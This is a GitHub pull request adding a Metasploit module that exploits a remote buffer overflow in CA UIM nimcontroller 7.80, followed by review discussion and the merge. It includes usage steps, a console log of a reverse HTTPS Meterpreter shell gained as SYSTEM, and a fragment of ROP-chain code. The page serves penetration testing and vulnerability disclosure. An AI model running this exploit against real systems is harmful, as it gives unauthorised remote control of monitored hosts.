
CVE-2020-8010 & CVE-2020-8012 #13875

Merged
merged 5 commits into from
Jul 31, 2020

Conversation

wetw0rk
Contributor

@wetw0rk wetw0rk commented Jul 21, 2020

CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow

This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller. The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list probe. Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the directory_list probe.

Verification Steps

  1. Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)
  2. Start msfconsole
  3. Do use exploit/windows/nimsoft/nimcontroller_bof
  4. Do set RHOSTS <ip>
  5. Do exploit
  6. Verify shell is opened and service is still accessible
msf5 exploit(windows/nimsoft/nimcontroller_bof) > options 

Module options (exploit/windows/nimsoft/nimcontroller_bof):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DIRECTORY  C:\              no        Directory path to obtain a listing
   RHOSTS     W.X.Y.Z          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      48000            yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     A.B.C.D          yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal (x64) - v7.80.3132


msf5 exploit(windows/nimsoft/nimcontroller_bof) > exploit 

[*] Started HTTPS reverse handler on https://A.B.C.D:8443
[*] W.X.Y.Z:48000 - Executing automatic check (disable AutoCheck to override)
[*] https://A.B.C.D:8443 handling request from W.X.Y.Z; (UUID: rpsri4cm) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (A.B.C.D:8443 -> W.X.Y.Z:50980) at 2020-07-21 11:14:09 -0500
[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe

 Directory of C:\

 12/15/2019 06:24 PM  <DIR> $GetCurrent
 12/14/2019 01:41 AM  <DIR> $Recycle.Bin
 10/18/2019 05:55 PM  <DIR> Documents and Settings
 07/21/2020 10:15 AM  <DIR> pagefile.sys
 07/14/2020 03:41 PM  <DIR> PerfLogs
 06/10/2020 09:18 AM  <DIR> Program Files
 07/19/2020 01:37 PM  <DIR> Program Files (x86)
 07/14/2020 03:41 PM  <DIR> ProgramData
 12/15/2019 07:08 PM  <DIR> Recovery
 07/21/2020 10:15 AM  <DIR> swapfile.sys
 10/18/2019 04:04 PM  <DIR> System Volume Information
 12/15/2019 07:09 PM  <DIR> Users
 07/18/2020 02:20 PM  <DIR> Windows

[+] W.X.Y.Z:48000 - The target is vulnerable.

meterpreter > 
[*] Session ID 1 (A.B.C.D:8443 -> W.X.Y.Z:50980) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DESKTOP-JICNNRT
[*] Current server process: notepad.exe (1860)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 7472
[+] Successfully migrated into process 7472

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(windows/nimsoft/nimcontroller_bof) > set DIRECTORY C:\\Users\\
DIRECTORY => C:\Users\
msf5 exploit(windows/nimsoft/nimcontroller_bof) > check

[*] W.X.Y.Z:48000 - Version 7.80 [Build 7.80.3132, Jun  1 2015] detected, sending directory_list probe

 Directory of C:\Users\

 03/19/2019 12:02 AM  <DIR> All Users
 12/15/2019 07:14 PM  <DIR> Default
 03/19/2019 12:02 AM  <DIR> Default User
 03/18/2019 11:49 PM  <DIR> desktop.ini
 07/19/2020 01:37 PM  <DIR> REDACTED
 12/15/2019 09:07 PM  <DIR> Public

[+] W.X.Y.Z:48000 - The target is vulnerable.

From #13866.

Contributor

@acammack-r7 acammack-r7 left a comment


This looks neat, thanks! As much as I enjoy the endless range syntax from Ruby 2.6, we still have to support Ruby 2.5 for now, so these have to be converted to the more traditional [i..-1] syntax.

3 review comments on modules/exploits/windows/nimsoft/nimcontroller_bof.rb (outdated, resolved)
@smcintyre-r7 smcintyre-r7 self-assigned this Jul 24, 2020
@smcintyre-r7 smcintyre-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Jul 24, 2020
@label-actions

label-actions bot commented Jul 24, 2020

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@wetw0rk
Contributor Author

wetw0rk commented Jul 24, 2020

not a fan of how rubocop spaces it 🤮, but it is what it is 😂

    alignment = rand_text_alphanumeric(7) # Adjustment for the initial chain
    rop_chain = generate_rsp_chain # Stage1: Stack alignment
    rop_chain += rand_text_alphanumeric(631) # Adjust for second stage
    rop_chain += generate_rop_chain # Stage2: GetModuleHandleA, GetProcAddressStub, VirtualProtectStub
    rop_chain += rand_text_alphanumeric((3500 - # ROP chain MUST be 3500 bytes, or exploitation WILL fail

@smcintyre-r7
Contributor


@bcoles bcoles dismissed acammack-r7’s stale review July 30, 2020 14:38

Comments regarding Ruby 2.5 support have been addressed

@bcoles bcoles removed the needs-linting The module needs additional work to pass our automated linting rules label Jul 30, 2020
@smcintyre-r7
Contributor

So for testing this, I'm not sure where to get this "Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)". I checked the link to CA UIM in your docs but: 1) it doesn't look like there's any reference to a nimsoftrobotXXX.exe and 2) it looks like you have to have a support contract to login and access the installers.

Can you confirm if that's correct and provide some clarification on if and how I can access the installer for testing this?

@bcoles
Contributor

bcoles commented Jul 30, 2020

So for testing this, I'm not sure where to get this "Install the CA UIM v7.80.3132 (nimsoftrobotXXX.exe)". I checked the link to CA UIM in your docs but: 1) it doesn't look like there's any reference to a nimsoftrobotXXX.exe and 2) it looks like you have to have a support contract to login and access the installers.

Can you confirm if that's correct and provide some clarification on if and how I can access the installer for testing this?

Software is not available as per #13866 (comment)

@smcintyre-r7
Contributor

Thanks! I missed that PR for context. In that case, as was stated, we'll definitely need a PCap for demo purposes sent over to msfdev@metasploit.com (feel free to CC me directly at smcintyre@metasploit.com). I'll keep my eye out for it and once I've had a chance to review it, I can see about landing this PR.

@wetw0rk
Contributor Author

wetw0rk commented Jul 30, 2020

@bcoles unfortunately you are correct: you cannot get this software without contacting CA or Broadcom. I'm actually unaware of the exact download link, as this software was just handed to me to begin research on. You can find more research on this protocol here:

https://github.com/wetw0rk/CA-UIM-Nimbus-Research

Went ahead and shot you an email @smcintyre-r7; lemme know if you guys need anything else. Wish I could get you a copy, but unfortunately I cannot.

smcintyre-r7 added a commit that referenced this pull request Jul 31, 2020
@smcintyre-r7 smcintyre-r7 merged commit 8421b1a into rapid7:master Jul 31, 2020
@smcintyre-r7
Contributor

After reviewing the PCap that was sent to the Metasploit developers mailing list, everything appears to be in order. I made a few minor changes to the docs per suggestions from msftidy_docs in commit 2fb89f4 and have landed this module.

Thank you for this contribution @wetw0rk ! 🎉

It's not every day I see a ROP chain for 64-bit Windows, so that's pretty cool.

@smcintyre-r7
Contributor

smcintyre-r7 commented Jul 31, 2020

Release Notes

New module exploits/windows/nimsoft/nimcontroller_bof achieves remote code execution by exploiting an unauthenticated, remotely-exploitable stack buffer overflow in CA Infrastructure Management monitoring agents prior to 9.20. The relevant vulnerabilities are CVE-2020-8010 and CVE-2020-8012.

@wetw0rk
Contributor Author

wetw0rk commented Jul 31, 2020

w00tw00t thanks man 🔥 🎊

@wetw0rk wetw0rk deleted the wetw0rk branch July 31, 2020 13:21
@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 6, 2020